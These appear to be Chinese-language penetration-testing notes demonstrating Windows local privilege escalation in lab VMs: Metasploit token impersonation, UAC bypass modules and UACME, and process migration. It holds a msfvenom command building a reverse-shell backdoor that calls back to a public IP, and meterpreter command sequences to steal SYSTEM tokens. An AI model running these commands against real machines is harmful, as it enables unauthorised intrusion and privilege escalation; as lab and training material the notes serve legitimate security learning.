WIN程序注入&BypassUAC&令牌竊取
WIN程序注入&BypassUAC&令牌竊取
本地提權—win令牌竊取
假冒令牌可以假冒一個網路中的另一個使用者進行各類操作。
所以當一個攻擊者需要域管理員的操作許可權時候,需通過假冒域管理員的令牌進行攻擊。
我這裡用到了windowns2008虛擬機器做演示
先用msf生成一個後門
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe
msf上線
use incognito
匯入模組
list_tokens -u
列出程序
impersonate_token "NT AUTHORITY\SYSTEM"
獲得system許可權
BypassUAC繞過提權
什麼是UAC?如何設定?
UAC(UserAccount Control,使用者賬戶控制)
簡言之就是在Vista及更高版本中通過彈框進一步讓使用者
確認是否授權當前可執行檔案來達到阻止惡意程式的目的。
可以通過命令msconfig啟動管理器,更改UAC設定等級(預設等級)
參考:http://cn-sec.com/archives/116488.html
BypassUAC提權?常見繞過專案?
為了遠端執行目標的exe或者bat可執行檔案繞過此安全機制,以此叫BypassUAC
繞過專案:MSF內建,Powershell滲透框架,UACME專案(推薦)
https://github.com/hfiref0x/UACME
在msf自帶的提權getsystem中,如果遇到UAC,則不會成功。
win7演示:
使用msf自帶模組繞過uac
use exploit/windows/local/bypassuac
getsystem
獲得最高許可權
另外我用了Win7 虛擬機器進行 本地提權
我使用了這個模組:use exploit/windows/local/ask
但是該模組實際上只是以高許可權重啟一個返回式shellcode,並沒有繞過UAC,會觸發系統UAC,受害機器有提示,提示使用者是否要執行,如果使用者選擇“yes”,就可以程式返回一個高許可權meterpreter shell,相當於釣魚攻擊。
當用戶點選”是“後getsystem
。
獲得最高許可權。
程序注入
我用了win2008虛擬機器做了演示
ps
命令檢視程序
migrate PID
遷移對應PID
獲得最高許可權